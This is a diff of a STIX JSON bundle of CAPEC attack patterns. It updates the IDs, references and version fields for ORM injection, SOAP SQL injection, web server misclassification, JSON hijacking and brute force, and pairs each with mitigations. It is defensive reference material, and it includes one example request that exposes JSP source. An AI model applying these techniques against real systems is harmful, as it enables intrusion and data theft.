"relationship--eb3a7a0f-6512-45a1-a711-855fa3d9856c", + "source_ref": "course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6402f030-9e5f-48fb-b4ce-836e9a0d81b9" + "target_ref": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6" }, { "name": "Object Relational Mapping Injection", "description": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -1745,65 +1756,66 @@ "When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ca9c8abb-92f4-4888-92cf-a215301c107d" + "id": "attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-109-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", "type": "course-of-action", - "id": "course-of-action--7a25af3c-c0a4-457c-a8bc-008deea13e1a" + "id": "course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f7034f6c-e527-4e90-ba8a-6d5b7c788d8f", - "source_ref": "course-of-action--7a25af3c-c0a4-457c-a8bc-008deea13e1a", + "id": "relationship--546e4b92-0622-4b9b-81ad-fcceb717bc4c", + "source_ref": "course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ca9c8abb-92f4-4888-92cf-a215301c107d" + "target_ref": "attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-109-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application.", "type": "course-of-action", - "id": "course-of-action--a6fb814c-7589-418e-ace9-58cc39dcb1a4" + "id": "course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c39c9bf8-bc0b-4ed7-8905-c41aefb66da6", - "source_ref": "course-of-action--a6fb814c-7589-418e-ace9-58cc39dcb1a4", + "id": "relationship--14079416-a0e8-4923-9eda-2849d1b430ee", + "source_ref": "course-of-action--dc1ceef0-501c-43b4-971b-0ba43a8c610d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ca9c8abb-92f4-4888-92cf-a215301c107d" + "target_ref": "attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac" }, { "name": "Cause Web Server Misclassification", "description": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process. This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -1860,40 +1872,41 @@ "\n J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.\n http://victim.site/login.jsp.\n Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.\n [R.11.2]\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--83bc6a16-f9ab-4f8c-86df-43a8a17d61e8" + "id": "attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-11-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Server routines should be determined by content not determined by filename or file extension.", "type": "course-of-action", - "id": "course-of-action--6cc68bee-5621-4278-8846-b587924eaf64" + "id": "course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dc780eef-207a-4064-ac15-d1dd7b5d6b9c", - "source_ref": "course-of-action--6cc68bee-5621-4278-8846-b587924eaf64", + "id": "relationship--7f31dd17-08ce-4ce9-a6ab-af300137930a", + "source_ref": "course-of-action--c5116127-47a4-45bb-82b5-941771ae2b72", "relationship_type": "mitigates", - "target_ref": "attack-pattern--83bc6a16-f9ab-4f8c-86df-43a8a17d61e8" + "target_ref": "attack-pattern--e2036f8f-24fd-4045-a3a6-f74bd0e5cc0f" }, { "name": "SQL Injection through SOAP Parameter Tampering", "description": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -1954,93 +1967,94 @@ "An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. He notices that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies his payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a91cd454-a15b-4df1-8f3d-3581322f24f0" + "id": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-110-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Properly validate and sanitize/reject user input at the service provider.", "type": "course-of-action", - "id": "course-of-action--942cfb74-df21-425e-9853-56db1cbaacbb" + "id": "course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--879d70bf-f73c-4561-8cbb-cec93f4783d9", - "source_ref": "course-of-action--942cfb74-df21-425e-9853-56db1cbaacbb", + "id": "relationship--dac60376-221f-4f8b-8e87-6a9be6bbdd6d", + "source_ref": "course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a91cd454-a15b-4df1-8f3d-3581322f24f0" + "target_ref": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-110-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.", "type": "course-of-action", - "id": "course-of-action--bab5bf8c-262d-4aa2-9f91-a0d8a7fcf2b1" + "id": "course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b92f0e98-f2f3-467a-a945-27ff88563216", - "source_ref": "course-of-action--bab5bf8c-262d-4aa2-9f91-a0d8a7fcf2b1", + "id": "relationship--a4607e08-74ba-474f-84b1-b14053c9c7fa", + "source_ref": "course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a91cd454-a15b-4df1-8f3d-3581322f24f0" + "target_ref": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-110-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly.", "type": "course-of-action", - "id": "course-of-action--28794544-317d-4331-8f54-86959c68e1c1" + "id": "course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--83ea991a-970c-4c16-9fbe-8d7076b2e93c", - "source_ref": "course-of-action--28794544-317d-4331-8f54-86959c68e1c1", + "id": "relationship--f47e6dc7-0c11-4423-8905-ce9233c8aa56", + "source_ref": "course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a91cd454-a15b-4df1-8f3d-3581322f24f0" + "target_ref": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d" }, { "name": "JSON Hijacking (aka JavaScript Hijacking)", "description": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website. An attacker gets the victim to visit his or her malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server. There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -2081,120 +2095,121 @@ "Read Data" ] }, - "x_capec_abstraction": "Detailed", + "x_capec_abstraction": "Standard", "x_capec_example_instances": [ "\n Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when he or she receives it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.\n When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--99e6e381-3460-4b46-95bd-7655aae8977f" + "id": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-111-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.", "type": "course-of-action", - "id": "course-of-action--8691e808-b8f7-4bb6-bef2-b6b987a70cf1" + "id": "course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--436ef4c0-b3ed-41df-96ba-21555065c081", - "source_ref": "course-of-action--8691e808-b8f7-4bb6-bef2-b6b987a70cf1", + "id": "relationship--47afd0f6-2880-4127-9e59-1ab92546ffa0", + "source_ref": "course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--99e6e381-3460-4b46-95bd-7655aae8977f" + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-111-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", "type": "course-of-action", - "id": "course-of-action--ebef3761-4be2-4ccb-8597-15a771f75e74" + "id": "course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--575ed5df-1e0d-4d58-b0ab-a2007a8781ba", - "source_ref": "course-of-action--ebef3761-4be2-4ccb-8597-15a771f75e74", + "id": "relationship--b790204c-09bb-42ab-af79-4dfe85f6a848", + "source_ref": "course-of-action--c4bb2d50-037a-4179-b7d7-e8288bc4ec88", "relationship_type": "mitigates", - "target_ref": "attack-pattern--99e6e381-3460-4b46-95bd-7655aae8977f" + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-111-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.", "type": "course-of-action", - "id": "course-of-action--af1c4d5f-6018-402e-9b1a-8fae9ee8a526" + "id": "course-of-action--96c87468-200e-4be4-a794-c97c7366f580" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c8f6b9ab-350e-4cc5-b7f6-35881e4abcbc", - "source_ref": "course-of-action--af1c4d5f-6018-402e-9b1a-8fae9ee8a526", + "id": "relationship--3cf737b6-79f0-4786-af11-37a8ad5849b1", + "source_ref": "course-of-action--96c87468-200e-4be4-a794-c97c7366f580", "relationship_type": "mitigates", - "target_ref": "attack-pattern--99e6e381-3460-4b46-95bd-7655aae8977f" + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-111-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.", "type": "course-of-action", - "id": "course-of-action--c7cb0534-5489-4a28-92cb-32d822597d3f" + "id": "course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b3f3ac31-413c-42d0-9181-7b09f3e1cf38", - "source_ref": "course-of-action--c7cb0534-5489-4a28-92cb-32d822597d3f", + "id": "relationship--1d52ef9a-ad22-42c8-a1e6-f7da34cec76f", + "source_ref": "course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--99e6e381-3460-4b46-95bd-7655aae8977f" + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42" }, { "name": "Brute Force", "description": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset. Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. While the defender cannot control the resources available to an attacker, they can control the size of the secret space. Creating a large secret space involves selecting one's secret from as large a field of equally likely alternative secrets as possible and ensuring that an attacker is unable to reduce the size of this field using available clues or cryptanalysis. Doing this is more difficult than it sounds since elimination of patterns (which, in turn, would provide an attacker clues that would help them reduce the space of potential secrets) is difficult to do using deterministic machines, such as computers. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information. For example, a secret space that will likely take hundreds of years to explore is likely safe from raw-brute force attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -2244,65 +2259,66 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--18f9508a-8fa0-49d5-8886-b877d2f4592d" + "id": "attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-112-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.", "type": "course-of-action", - "id": "course-of-action--04ee1298-c810-4ff9-9eb3-47c7b6146d2b" + "id": "course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--89ae962d-7cc4-4aab-925f-9372d1fe51d6", - "source_ref": "course-of-action--04ee1298-c810-4ff9-9eb3-47c7b6146d2b", + "id": "relationship--13d97a1d-7ced-4f30-bf94-573c1209abde", + "source_ref": "course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356", "relationship_type": "mitigates", - "target_ref": "attack-pattern--18f9508a-8fa0-49d5-8886-b877d2f4592d" + "target_ref": "attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-112-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.", "type": "course-of-action", - "id": "course-of-action--60c2128f-34a9-41ed-968b-5b63ff3529a7" + "id": "course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a7445436-d421-4086-ab45-beeb55596b97", - "source_ref": "course-of-action--60c2128f-34a9-41ed-968b-5b63ff3529a7", + "id": "relationship--967de655-db81-4012-959a-55f1a9673fc9", + "source_ref": "course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97", "relationship_type": "mitigates", - "target_ref": 